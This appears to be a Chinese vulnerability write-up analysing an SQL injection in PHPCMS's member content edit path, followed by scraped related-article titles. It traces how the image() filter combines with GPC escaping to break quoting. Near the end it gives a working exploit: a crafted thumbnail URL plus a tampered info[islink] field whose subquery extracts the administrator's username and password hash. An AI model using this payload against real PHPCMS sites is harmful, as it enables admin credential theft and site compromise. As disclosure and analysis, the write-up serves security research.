php cms 代码注入,PHPCMS全版本通杀SQL注入漏洞
漏洞分析
首先看下面的代码
/phpcms/modules/member/content.php 202行 edit函数
[php]
public function edit() {
$_username = $this->memberinfo['username'];
if(isset($_POST['dosubmit'])) {
$catid = $_POST['info']['catid'] = intval($_POST['info']['catid']);
$siteids = getcache('category_content', 'commons');
$siteid = $siteids[$catid];
$CATEGORYS = getcache('category_content_'.$siteid, 'commons');
$category = $CATEGORYS[$catid];
if($category['type']==0) {//审核状态时,点编辑 再提交,进入if分支
$id = intval($_POST['id']);
$catid = $_POST['info']['catid'] = intval($_POST['info']['catid']);
$this->content_db = pc_base::load_model('content_model');
$modelid = $category['modelid'];
$this->content_db->set_model($modelid);
//判断会员组投稿是否需要审核
$memberinfo = $this->memberinfo;
$grouplist = getcache('grouplist');
$setting = string2array($category['setting']);
if(!$grouplist[$memberinfo['groupid']]['allowpostverify'] || $setting['workflowid']) {
$_POST['info']['status'] = 1;
}
$info = array();
foreach($_POST['info'] as $_k=>$_v) {
if(in_array($_k, $fields)) $_POST['info'][$_k] = ew_html_special_chars(trim_script($_v));
}
$_POST['linkurl'] = str_replace(array('"','(',')',",",' '),'',new_html_special_chars($_POST['linkurl']));
//exit(print_r($_POST['info']));
$this->content_db->edit_content($_POST['info'],$id);
$forward = $_POST['forward'];
showmessage(L('update_success'),$forward);
}
} else {
//...
}[/php]
229行
[php]
$this->content_db->edit_content($_POST['info'],$id);[/php]
其中 $_POST['info'] 参数是一个数组,其内容是在线投稿的各项内容,如图所示
好了,接下来我们看看这些数据都经过了怎样的处理...
跟上edit_content函数
/phpcms/model/content_model.class.php 第234行开始
[php]
public function edit_content($data,$id) {
$model_tablename = $this->model_tablename;
//前台权限判断
if(!defined('IN_ADMIN')) {
$_username = param::get_cookie('_username');
$us = $this->get_one(array('id'=>$id,'username'=>$_username));
if(!$us) return false;
}
$this->search_db = pc_base::load_model('search_model');
require_once CACHE_MODEL_PATH.'content_input.class.php';
require_once CACHE_MODEL_PATH.'content_update.class.php';
$content_input = new content_input($this->modelid);
$inputinfo = $content_input->get($data);//跟进此函数
// /caches/caches_model/caches_data/content_input.class.php get函数
$systeminfo = $inputinfo['system'];
[/php]
第248行,我们可以看到 $_POST['info'] 数组进入了 get 函数,继续跟进
/caches/caches_model/caches_data/content_input.class.php 第55行开始
[php]
if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips);
$MODEL = getcache('model', 'commons');
$this->db->table_name = $this->fields[$field]['issystem'] ? $this->db_pre.$MODEL[$this->modelid]['tablename'] : $this->db_pre.$MODEL[$this->modelid]['tablename'].'_data';
if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value),$field) && ROUTE_A != 'edit') showmessage($name.L('the_value_must_not_repeat'));
$func = $this->fields[$field]['formtype'];
if(method_exists($this, $func)) $value = $this->$func($field, $value);//这里是关键,后面慢慢说明
if($this->fields[$field]['issystem']) {
$info['system'][$field] = $value;
} else {
$info['model'][$field] = $value;
}[/php]
我们重点关注这里是怎么处理的
[php]
if(method_exists($this, $func)) $value = $this->$func($field, $value);
[/php]
为了方便看清楚程序在这里究竟是怎样处理的,我们在这行代码前面加入以下调试代码,看看都经过了哪些函数的处理...
[php]
if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips);
$MODEL = getcache('model', 'commons');
$this->db->table_name = $this->fields[$field]['issystem'] ? $this->db_pre.$MODEL[$this->modelid]['tablename'] : $this->db_pre.$MODEL[$this->modelid]['tablename'].'_data';
if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value),$field) && ROUTE_A != 'edit') showmessage($name.L('the_value_must_not_repeat'));
$func = $this->fields[$field]['formtype'];
echo "
Function :-->".$func."";//这是添加的调试代码
if(method_exists($this, $func)) $value = $this->$func($field, $value);//这里是关键,后面慢慢说明
if($this->fields[$field]['issystem']) {
$info['system'][$field] = $value;
} else {
$info['model'][$field] = $value;
}[/php]
编辑投稿内容,提交
看见了吧,我们提交的内容经过了如下几个函数:catid title keyword copyform textarea editor image islink box
经过分析后,我们重点关注image函数,继续跟上
/caches/caches_model/caches_data/content_input.class.php 第102行 image函数
[php]
function image($field, $value) {
$value = str_replace(array("'",'"','(',')'),'',$value);
return trim($value);
}[/php]
过滤了"'"、"("、")",但是呢 我们知道当开启了GPC的时候,单引号会被转义 '-->\'
明白了吧? image函数过滤了单引号,假设我们提交的数据恰巧经过了image函数,则单引号被过滤了,留下"\",那么这个"\"将会吃掉一个单引号,造成注入
#3 漏洞Poc
条件:后台开启投稿,并要求审核
step1 在会员中心随便投一篇文章,提交
step2 点击编辑,如下
step3 在缩略图栏填入 http://www.vulns.org/sql.jpg',如图
提交后,报错了...
# 漏洞最终利用Exp
在缩略图栏填入:http://www.vulns.org/sql.jpg'
点击提交,采用Tamper data抓包修改,将info[islink]修改为
[php]
,title=(select concat(username,password) from v9_admin where userid=1) -- felixk3y
[/php]
点击确定,再点编辑 即可读取管理员账号 密码,如图
from:felixk3y@wooyun.org
php cms 代码注入,PHPCMS全版本通杀SQL注入漏洞相关推荐
- /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...
- 易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序, 找到get_client_ip()函数 ...
- recommend.php sql注入漏洞,Espcms通杀SQL注入漏洞分析(附EXP)
漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操 ...
- Espcms通杀SQL注入漏洞分析(附EXP)
漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay 博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有 ...
- CVE-2017-11882 POC 全版本通杀
POC https://github.com/embedi/CVE-2017-11882 转载于:https://www.cnblogs.com/smxiazi/p/7875266.html
- /plus/recommend.php sql注入漏洞,代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法 | Seay 渗透 编程 代码审计 网络安全博客...
显示不全请点击全屏阅读 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商 ...
- thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件 根据官方文档对"防止SQL注入" ...
- 测试php框架漏洞,ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
作者: seay 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商不要再 ...
- 怎么进行mysql注入测试_MySQL for Java的SQL注入测试
只要你学JDBC,基本上所有的人都会和你说,Statement不能防止SQL注入, PreparedStatement能够防止SQL注入. 基本上参加工作了一段时间之后还是这么认为的, 没错, 这句是 ...
最新文章
- 前端书签归纳(持续更新)
- 日常生活小技巧 -- word中插入visio和视频
- java 6 jaxb_JAVA6开发WebService (五)—— JAXB
- 语义分割——上采样插值resize的学习笔记
- mysql 联合查询去重复_两个表联合查询去重复GROUP_CONCAT
- Timesten安装
- 2019ug最新版本是多少_UGNX将在2019年隆重发布最新版本,也是最后一个版本,让你我都想不到的是..........
- 《大明王朝》赵贞吉的拉扯
- 如何设计一个可扩展的优惠券功能
- 家具生产设备_家具生产线
- 程序员健康指南---做出改变
- 常见的三种中文内码转换代码
- 安卓进阶开发资料之分享
- MBA-day25 最值问题-应用题
- 51单片机堆栈深入剖析
- 车间和仓库可以一起吗_仓库与车间交接之规定
- axios访问后台404_使用 axios 后台无法接收到数据的解决方案
- “通过管理风险与机会,完善质量管理”顶级质量大师质量讲座录音文字稿
- (已开源)微软出品:老照片自动修复技术
- 基于JAVA进出货管理系统计算机毕业设计源码+数据库+lw文档+系统+部署
热门文章
- 【Kay】电商数据分析指标拆解
- 【Kay】A/B Test基本原理
- linux 分区表恢复
- GB/T 39725-2020 信息安全技术 健康医疗数据安全指南-思维导图梳理
- 微信跳一跳python全部代码_微信跳一跳辅助python代码实现
- 法律家法律条文检索网站
- 基于javaweb的美容院预约管理系统(java+springboot+jsp+jquery+mysql)
- 转载:margin负值的应用
- mysql新建data的方法_mysql建立数据库的方法
- 【趣味杂谈】ChatGPT,不止是第四次工业革命的开始